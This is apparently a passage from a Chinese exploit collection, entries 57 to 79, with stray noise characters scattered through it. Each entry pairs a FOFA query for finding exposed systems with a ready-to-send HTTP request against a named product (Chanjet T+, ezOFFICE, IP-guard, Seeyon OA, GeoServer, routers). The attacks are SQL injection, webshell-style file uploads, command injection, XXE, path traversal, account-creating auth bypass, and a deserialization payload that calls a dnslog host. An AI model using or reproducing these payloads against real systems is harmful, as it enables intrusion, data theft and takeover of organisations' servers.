! _7 j$ `9 ~' b8 h0 ` "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",; D- ^$ X7 e( \: F/ s0 [
"StartInfo": {0 s7 d q: `9 u0 j
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",, F3 R, }1 M: R8 ?# i
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
4 a9 a" f _5 V, O* U% _7 n# f: f }
' Q! ~1 y, Z/ f }
& N) M. d& j1 X+ ]" S q8 \ }8 g4 E2 x4 n7 S; h
}+ L1 t, A: n# A+ q
. J5 r" F. X# y9 ^$ L) k6 J7 p3 U
' m. `+ {6 }1 `( q57. 畅捷通T+ keyEdit.aspx SQL注入
, g( F5 L! ^" }/ nFOFA:app="畅捷通-TPlus"( v1 V8 @7 ]; t7 R; d' U
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
) ]# ^9 }. h! L! P0 O6 MHost: host
8 h' r! \2 A5 t, i( tUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
2 F5 J3 E+ n1 T0 s K6 q i! RAccept-Charset: utf-8
9 W) u6 Y! J2 G1 ]7 d6 A9 O5 XAccept-Encoding: gzip, deflate( x: z7 e* {! E% c' f9 p
Connection: close
* ~5 D6 ~1 f7 R" S: s9 E0 d1 F( O6 p1 p# {/ s* T8 t
& m: l3 c9 Q8 T' e58. 畅捷通T+ KeyInfoList.aspx sql注入, c+ _1 g' a$ ~" f& `( P
FOFA:app="畅捷通-TPlus"6 C8 Y( o! j' x* O: Y: H
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1% r+ P! `, R$ G k6 c; l0 S
Host: your-ip# w! y5 c0 [; N: a1 }+ S2 z
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36' x2 G) L( L# t1 v
Accept-Charset: utf-8
4 ]3 F S9 a" e( Y4 I" y6 i- W$ DAccept-Encoding: gzip, deflate7 o, m, h+ D4 w( q. W
Connection: close
, c0 `: P! ^0 r7 o) z8 A& W
0 R" }/ p: O- }% D9 t5 s9 h" U2 O6 @( O, v8 _( [( J3 p
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
) S" d; y) R R% s! K! a$ mFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"" K1 c3 E7 f P! e6 Z6 ~; W) ~
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
7 K; o0 ^1 v& a( SHost: 192.168.86.128:90902 F3 M$ w3 n: g* [( x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.366 F. h. f: {( L0 b1 ?2 m
Connection: close
- W; W% r8 L+ q6 S% OContent-Length: 1669- o$ Z b) M: ~" C9 ?& ^
Accept: */*% {' i5 ?+ A) V
Accept-Language: en
8 I4 S) y; q1 z' H. A: YContent-Type: application/x-www-form-urlencoded: I$ x, N2 u( U( ~: l
Accept-Encoding: gzip
1 G, D6 x0 r+ D+ U+ C( c! W$ }; q" k
PAYLOAD
: _, q. A7 R- }4 K7 Q5 Q9 j+ \9 x) z
7 j1 w0 t5 I8 d8 T60. 百卓Smart管理平台 importexport.php SQL注入
P) t2 ^' k5 v7 l% T; K, o- |FOFA:title="Smart管理平台") s& P" B9 n R
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
5 }5 n/ W9 H- [3 D0 e P( C0 ?Host:5 Y2 z# h4 f& d. Z- g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 m6 t/ J, |9 Y5 o ]1 Z- RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* n) {/ V- E: n' F: c: e a. aAccept-Encoding: gzip, deflate1 e$ b+ X9 @' R
Accept-Language: zh-CN,zh;q=0.9, \% i. q M: g( v7 _# {
Connection: close
& k0 f1 B/ A$ z8 @- \' \
6 T6 q# N( W% o" ?, _: `0 b, x' V5 ^. F' Z( c$ k) Z4 N
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传2 l, s3 W1 D! j2 m! o. x
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
- ~3 E9 I2 T- E5 d; t9 cPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
" N D3 r. r3 A3 H6 CHost: x.x.x.x' Q' l/ z2 I6 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& X1 ], d" y4 s l) hConnection: close
! C5 _6 K4 n q$ }; h8 }Content-Length: 27
$ J8 a5 d) N6 b5 g- x1 X9 v3 M' vAccept: */*- k4 T n# E! k: x
Accept-Encoding: gzip, deflate& N! I k+ L6 D) c9 x
Accept-Language: en
: U' u4 H6 C; lContent-Type: application/x-www-form-urlencoded$ z3 v' n6 G0 d- u4 f; _
) f' T8 X+ Q" g
8uxssX66eqrqtKObcVa0kid98xa
" O O. X: c& ~) { G) D/ u8 g4 Z( Y2 q8 x
! v+ p1 u" N9 W* U: \' a
62. IP-guard WebServer 远程命令执行8 l/ b+ x1 o" z/ g$ |9 d
FOFA:"IP-guard" && icon_hash="2030860561"
2 F) \1 O: e) ~9 X# b) ` I# k. dGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1, {7 W) z! ~8 ~& C
Host: x.x.x.x/ M7 c5 n# J9 ^9 N, s& r
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36: d' g2 `% l* g* i
Connection: close
, `- ]) S0 z) P# I- ?. vAccept: */*, g* L. I# j$ Y9 j/ V
Accept-Language: en
, G* I+ A% ]7 s- L, PAccept-Encoding: gzip
3 E- v( r. n: g7 g3 A3 Y' R9 y8 O F/ Q( b* P8 a
' v3 a# t/ w, F) m" X7 j访问+ g8 [) U8 Z- s8 y" B: y/ B
+ {) x$ C4 R$ o# cGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
4 u$ y* ^. S: b! O% z% nHost: x.x.x.x+ \- p7 i1 h7 [
5 G) t7 @" E4 D0 a9 L' y* b; M
$ g5 H( M1 y& e( B% v. W; o/ i
63. IP-guard WebServer任意文件读取
% j+ K6 D; T5 O3 e1 I3 hIP-guard < 4.82.0609.0
6 ?3 B! Q' `; q' F* `, wFOFA:icon_hash="2030860561"7 ~% ?5 Y# N$ P; f/ i
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1- e. v* q9 G7 D. m1 B6 I4 M- w
Host: your-ip J7 W" [4 I9 `3 Z, V+ U9 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36' v5 ^1 l. T- Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. L' S6 E# N; n' K* n& i- W9 z" kAccept-Encoding: gzip, deflate4 i" S( f* ~& L3 e
Accept-Language: zh-CN,zh;q=0.9* J# Q% L; z8 r. D
Connection: close5 A1 C; P( Q% q* Z4 i* Z
Content-Type: application/x-www-form-urlencoded8 }# s* u" W+ W1 ~7 Z. ^* c7 \
5 g- s9 s: b) F V; r1 Opath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A. X4 I0 I6 @( {% P7 }- h2 S+ d
% B% x7 o2 o) z2 S9 X/ X
64. 捷诚管理信息系统CWSFinanceCommon SQL注入. R! B" j2 e% f ?
FOFA:body="/Scripts/EnjoyMsg.js"* w; Y3 N; r# E0 p. E0 [
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
) f% ~* N+ T0 m' y6 `Host: 192.168.86.128:9001: o2 U$ \+ V/ \
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
0 y& \4 j9 ~7 v( e1 |8 Y: PConnection: close
$ O! N$ c2 A$ q$ t+ i! y5 c: iContent-Length: 3699 N! ]6 Q/ L2 \0 F( e: v
Accept: */*. _1 j% N+ w: U: ~: L. ^/ q3 K
Accept-Language: en
' h0 J# O# U' `Content-Type: text/xml; charset=utf-82 Y4 B: Z( h; D" V. B
Accept-Encoding: gzip( |0 \3 g8 _4 N% _2 x! D Q
! T, t+ Y4 g- a4 Y# ^' a# f
<?xml version="1.0" encoding="utf-8"?>
2 h) F) o' e+ K. ?! c% l) r<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"># C( e" M! H' `; a" N& N( [9 r% b
<soap:Body> y) R; I6 i0 Y! ~; E" d
<GetOSpById xmlns="http://tempuri.org/">1 O. s, d2 K( v+ u
<sId>1';waitfor delay '0:0:5'--+</sId>
1 J0 ^# r9 E3 W9 {8 @ </GetOSpById>
) o$ I, ?, I& t4 }2 f$ ?$ S </soap:Body>
! t* `& s; j& |* @</soap:Envelope>
6 g/ c+ s8 F: [7 D4 `
4 q8 K/ ~, N9 h1 f8 q7 e8 d6 a6 h; A" O, o) D" {( |2 @
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
7 k" V$ G# ^( w/ ]) Q ^+ G' D7 Y. cFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"% Z1 J/ t" Y J
响应200即成功创建账号test123456/123456* G) T0 n- ~' X8 p3 @$ | u- C Z6 b) m
POST /SystemMng.ashx HTTP/1.1( c/ @$ ?. ?6 R, L& R) ] B
Host:
0 S Z: E1 `' XUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
6 j- E) @& H& u; `4 B, ?Accept-Encoding: gzip, deflate: D' {! ?: I8 k: u
Accept: */*4 `9 d, ~4 U# e5 Q
Connection: close
' l$ y4 _6 W( _' N) D i5 s4 Q3 jAccept-Language: en5 X' r' u' B& o; A t2 @
Content-Length: 174
- ]) {3 v. p/ G# `7 j9 B
% k4 E$ g6 V' i. T$ p( yoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators* B: _8 Y! w5 e
* S3 `, q; P9 t T; W
" t5 D1 L$ W3 `# n66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入* g- p& c) b9 J2 V- a
FOFA:app="万户ezOFFICE协同管理平台", E& y& y! n c/ o1 |/ Z
( {$ z7 B+ X3 ~' \GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
2 H `. I. x. v6 z$ EHost: x.x.x.x
1 \6 H, Q- j4 QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
0 p8 A" ]7 o) L! OConnection: close
. P8 y; F( \3 P' s' L5 s' ]Accept: */*
6 A- ], ]: X+ x( yAccept-Language: en- K, G. o+ f8 g4 @
Accept-Encoding: gzip
9 Z7 P6 o! d& S, p/ H1 L6 P0 l7 g$ Y' j5 Z2 e8 d
/ l) u2 X' G0 O Q
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
7 X, Q$ H: O f& @* l% U
" v% Q& A& b+ p5 i9 x67. 万户ezOFFICE wpsservlet任意文件上传3 w! z/ P9 R& x1 o. v
FOFA:app="万户网络-ezOFFICE"
$ r: v$ x0 J- l1 H" k) N$ [# TnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
" \! J( S# m, @9 ~4 u% jPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
) }& L+ y9 p/ X( `1 d7 U/ g" G" XHost: x.x.x.x
9 P, X- A, V9 A+ o; P3 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
3 ^- n" m7 x4 `( ~4 i* iContent-Length: 173! W: x7 Z2 U0 l& v6 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8( B/ _* r$ F' o
Accept-Encoding: gzip, deflate8 G# w. ]* Q! }# U/ X
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
3 u* j o j7 o6 Y/ [2 hConnection: close
7 A5 s" E' l& @. z. g) j: uContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
2 |4 K: k3 M/ q3 R7 d" bDNT: 11 S, T! T% L; h
Upgrade-Insecure-Requests: 1
8 o) @. |# m/ _0 m( Y) W5 h5 Q- e5 B! X2 P7 H0 j
--ufuadpxathqvxfqnuyuqaozvseiueerp
8 ?: K1 `/ p. z1 P5 N7 t4 cContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
! ?) H8 i( i ?, H
! w% O4 f& g' \& P, }4 X; R0 W<% out.print("sasdfghjkj");%>2 A- s) I9 t S/ w
--ufuadpxathqvxfqnuyuqaozvseiueerp--
4 H" a* `2 ]5 ]8 y3 N* A( d, U% Z/ O _, i2 u
- ?1 \. ]: |0 K' z文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp$ J( ]9 t7 r( _8 _9 k
% P5 r1 ~. K, D8 |. p6 y2 c68. 万户ezOFFICE wf_printnum.jsp SQL注入
: L! p, S* I: T1 ?) q p- HFOFA:app="万户ezOFFICE协同管理平台"; P7 |& u9 ^2 s5 Y7 h
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1/ n0 E; {: ?6 p: d$ v
Host: {{host}}
4 }7 v. G4 R/ y( G" s/ WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
' M3 X- E; T3 ^5 b2 F" m5 q9 bAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.83 m3 ]2 z3 t4 Q
Accept-Encoding: gzip, deflate
' ^5 K2 w; w# w" h; n/ jAccept-Language: zh-CN,zh;q=0.9
( M6 k9 \5 C5 k' }6 w9 ]Connection: close
+ x* e, d- A4 {0 }; N8 y
! ~0 w, e$ q5 M; [- ?% M! J' h. ]8 _/ S8 [/ z1 S
69. 万户 ezOFFICE contract_gd.jsp SQL注入9 n4 m6 B3 X6 w2 U( U3 s) J
FOFA:app="万户ezOFFICE协同管理平台"
. W3 s3 e- ~( ~5 [* ^GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.12 L8 N# |* W* v- L l
Host: your-ip
! k$ g3 m3 b, W! k. _3 X( y, s; mUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.363 n8 D/ n0 D: H7 @
Accept-Encoding: gzip, deflate% }" p) H8 @- ?
Accept: */*
9 J+ h7 X$ m2 V1 I5 b0 gConnection: keep-alive
# I9 {7 x& T" g- g4 A
{+ _2 ~! J/ e' J- d- b
: T/ i Y5 Y5 b0 i5 L5 z70. 万户ezEIP success 命令执行 ^+ c7 r! j$ a( m% a" l; m b) W
FOFA:app="万户网络-ezEIP"2 d: U" N+ x% r
POST /member/success.aspx HTTP/1.1
) P* K/ D9 n$ Y1 T7 ^1 u5 MHost: {{Hostname}}
$ t- ?9 j; v4 f* y# vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
. V' b9 Z& |4 _2 L# ~SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
7 ~$ [; \! k5 R0 f/ |1 t7 yContent-Type: application/x-www-form-urlencoded
6 d2 ~- B* }+ x7 I9 t. QTYPE: C. ?' A6 q9 g% W* o; L9 ]
Content-Length: 16702- X; o2 b! x Z: O
5 x7 b. z( { @9 e
__VIEWSTATE=PAYLOAD
! i( A: n' j& D u1 s' D& ]& K+ q( d/ v% p( ?- C; @& ` L; _! B
! ~/ _$ y$ y0 n: i' b" h3 y3 f71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
?1 B$ S3 e: j% L; P- H9 ~* cFOFA:body="PM2项目管理系统BS版增强工具.zip"
# o- o% C1 a$ h8 h8 WGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1# _9 ? R B. R
Host: x.x.x.xx.x.x.x& }* v* ]+ r. _ U
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
8 i; x2 @* j; _' c" iConnection: close* ^( p. Z; x+ e u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 y" J, z2 w$ t2 P- N. Y; T% |' NAccept-Encoding: gzip, deflate; x, K0 E0 |# R- u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" |! f8 o' P/ o) i7 w6 o% q; M
Upgrade-Insecure-Requests: 10 }: ~; ?8 E6 H3 P) j
& d, w* J/ h! _$ |
9 F2 h) X- T0 i4 H" g" h
72. 致远OA getAjaxDataServlet XXE2 @7 s5 Q0 B# e: z5 U3 l) [) O
FOFA:app="致远互联-OA"
" g/ X* i$ g/ oPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
- g3 w9 \( e9 ^0 d; xHost: 192.168.40.131:8099! f8 V6 G+ Y, ^2 N) z' t! {# D" c2 n
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 n8 b+ g& A* K) B
Connection: close6 V, r5 r/ g; @ U8 _
Content-Length: 583' j" L. D0 i6 r' j7 s
Content-Type: application/x-www-form-urlencoded
1 o- ]: s9 W# b. a9 B) ?Accept-Encoding: gzip6 H" V; O0 }/ d) N: Y
# N; q. _$ L( P& h# z# @S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
) \* I. J, R) P X3 `$ I8 A' Z# B- `+ k0 N7 N# E% C
. [& M" u' I6 I% C8 X, y. y
73. GeoServer wms远程代码执行
0 F7 _% y7 E: rFOFA:icon_hash=”97540678”5 e9 v4 S# q( `6 y/ o
POST /geoserver/wms HTTP/1.1, U: h$ t B5 A" E
Host:' p$ }# x' ?5 l0 m- {. C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36. ^9 t" k. ^4 {% ]& n# g6 y
Content-Length: 1981
5 Z; j( t7 \& Y2 }Accept-Encoding: gzip, deflate
2 }; s% h4 G) h: uConnection: close( ~, e a. m) g7 P$ G
Content-Type: application/xml5 t' H: u" D& g6 d) s: `
SL-CE-SUID: 35 d% ^' ]6 \5 r- U% A+ l% D6 u
2 D1 _. P. ?: p/ s- w* a
PAYLOAD! Z3 p( B0 S6 }$ P+ n% _
- f, i) ~ b, \- n5 j
+ f( B$ @. g7 B. I% h74. 致远M3-server 6_1sp1 反序列化RCE! b% W( e! F! N
FOFA:title="M3-Server" a+ \" p% F1 W% [
PAYLOAD
" D+ M- ?: v- r- y
4 H$ E3 X" R' _7 f& L7 C" t, A75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE! `+ f0 a6 X- G7 k0 m
FOFA:app="TELESQUARE-TLR-2005KSH"+ J- I3 d$ ?- M
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1* j- R: W. @0 |5 j. L+ t" T
Host: x.x.x.x/ G5 V" K, G, n1 _5 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 }( k( l S; s; i3 V
Connection: close" _5 s+ S& b; G8 a9 S
Accept: */*
' |* L( i" J, y1 T: IAccept-Language: en7 u1 P; j7 C5 a1 j( @
Accept-Encoding: gzip
' d. @# P3 D7 l4 ~* L; w; E( _. T7 f2 Y# y* J
0 r" l K) _3 F; x, ]: TGET /cgi-bin/test28256.txt HTTP/1.1" o- ?% M& @6 G" u
Host: x.x.x.x/ }5 `% B7 ?# X- {+ F
; M9 Q6 @! P& ]* n" ~% B
- b t* n: u* F7 R. A7 l1 m" q76. 新开普掌上校园服务管理平台service.action远程命令执行( R3 g5 Y3 x" f$ {% x$ Q4 V3 i. M
FOFA:title="掌上校园服务管理平台"
, l1 P ^6 j1 \& BPOST /service_transport/service.action HTTP/1.1
- T$ H h. \* j+ F9 W0 P* IHost: x.x.x.x5 W7 b) ]* x& p, ^% ^/ {7 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0; j3 C! E" ~: E& y8 H4 i5 Q+ q
Connection: close s; ?: S1 c; @ U# Z7 b
Content-Length: 211, H) B* m6 \* }% o$ G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 s8 E B. t. [! t
Accept-Encoding: gzip, deflate
5 u8 F2 j1 z- A) v" G* {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- a9 J) x+ v8 A( q! _9 O) aCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
; z H, j; O, K) l& }Upgrade-Insecure-Requests: 1& q$ ]8 e( p7 p
4 L' P% N) M. D2 q3 D
{
# ?1 o( I9 Y) m"command": "GetFZinfo",
- i# K; ~/ B" d* d "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
9 \8 \5 O6 z* j9 B; u ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"3 t9 R2 Y+ F! J
}8 v5 h- P% h" i3 \3 I$ B
3 y- B! D5 b5 U% N' _, u
1 P' u7 e6 l4 Z7 w$ v& c
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
% }) }9 \# k/ e$ H, ?; r1 |Host: x.x.x.x
, ?- V; G# C7 w; t& a; X: B4 z3 C. ^4 p6 A6 F/ i
. N4 w0 {1 s- {( @* u5 |) M0 _1 b' A( E5 k8 y j# _
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
. p) }: b$ L8 n: cFOFA:body="F22WEB登陆"( R5 o. U* z& r- R( N
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1. g+ C5 P+ ]) V6 A
Host: x.x.x.x+ Q K( b+ I, G0 o$ d0 z0 K! ?! ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36% V) k/ q( t2 k* f; W
Connection: close
( h) D/ V* ?2 ]! w* n) r! VContent-Length: 433
$ ~+ v, d) u8 h$ B* nAccept: */*( o" }: T& ~ g7 Q, f3 f
Accept-Encoding: gzip, deflate
5 j6 U* d# i0 K. E: D0 tAccept-Language: zh-CN,zh;q=0.9
, Y/ w3 ^: t$ \1 ?2 tContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix+ K2 J! f) `( E1 P" g; A7 a
7 I1 W* o6 e6 n% V0 y+ o
------------398jnjVTTlDVXHlE7yYnfwBoix1 f1 F j% ?' ]! _/ r- Q& K
Content-Disposition: form-data; name="folder"% P0 L, o0 x7 U: L
d) j: c+ y1 {* L3 ~* T7 P5 [/upload/udplog
' J) m6 e5 w5 ~------------398jnjVTTlDVXHlE7yYnfwBoix
5 d. G0 {: n0 I6 F- g* XContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
0 o( [4 ?' V$ E5 A f, |: ~Content-Type: application/octet-stream
4 ^$ z( Y, T4 U s5 `
, E. v2 `1 b2 O. F/ G* m- uhello1234567
2 T" M c+ u2 b6 G& z------------398jnjVTTlDVXHlE7yYnfwBoix, u9 C5 o2 g3 l" f2 I2 O K5 R
Content-Disposition: form-data; name="Upload"
( T& M3 y& f( \2 f4 ]7 V5 D
: r* L' J1 D% S6 a oSubmit Query
+ @2 A: X7 L j/ g8 G: n------------398jnjVTTlDVXHlE7yYnfwBoix--6 d3 t3 T4 A j$ u+ U2 H) D
1 g$ G8 ~! N# q7 u9 c' {/ \3 h3 d) Y
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传* f! Z9 L+ J9 y. @5 ]! E. `
FOFA:icon_hash="2001627082" s; K' U) H& K( ^
POST /Platform/System/FileUpload.ashx HTTP/1.1
$ c! t( s+ x/ P6 F# T: O+ I& G8 _& @Host: x.x.x.x v2 a" ^: _% p, Z3 y- J' u" p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! C8 o1 R% J9 I: u6 ^Connection: close m5 f q$ M% P" K
Content-Length: 336
) e& l- K! K2 P6 L9 r8 qAccept-Encoding: gzip% h7 x0 t# W, K% }! }
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
2 U* _! `* u i! ]
" `+ @, ^% V3 O: e------YsOxWxSvj1KyZow1PTsh98fdu6l
/ v' I6 {* T; V) y n% vContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"- F1 R- c& o7 k) \9 ^
Content-Type: image/png% V$ r0 p5 B5 M3 A' d
+ b1 i+ H: T9 Z' ~% ^/ k
YsOxWxSvj1KyZow1PTsh98fdu6l
1 c |; V. h1 \9 t% H( Z/ u------YsOxWxSvj1KyZow1PTsh98fdu6l- f9 X. M& V g2 T% Z
Content-Disposition: form-data; name="target"
( k9 `$ R3 d1 J8 h% g6 a
3 [7 p! i9 Z& {/ c/ G; h/Applications/SkillDevelopAndEHS/' ~8 z7 Z9 l [" [' `
------YsOxWxSvj1KyZow1PTsh98fdu6l--
% A- B$ Y" R4 s6 F2 B% w
! d8 g, G! f. s$ v/ }2 a- G& i" p* L3 o0 J3 V, A2 Y1 ~6 `3 c
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
. g& @% B& _. |Host: x.x.x.x% u6 h% S7 j3 W- l
3 a2 y8 T# q O5 i( Q5 L3 a+ T) Y- N, I/ N
79. BYTEVALUE 百为流控路由器远程命令执行; \$ ?9 B0 L9 p
FOFA:BYTEVALUE 智能流控路由器
5 ~6 N# [- ^/ Z0 G2 W/ t9 }GET /goform/webRead/open/?path=|id HTTP/1.1
; K3 ]5 t: X: I& |0 hHost:IP
. _- s& |- M& |1 Q' {6 D+ qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
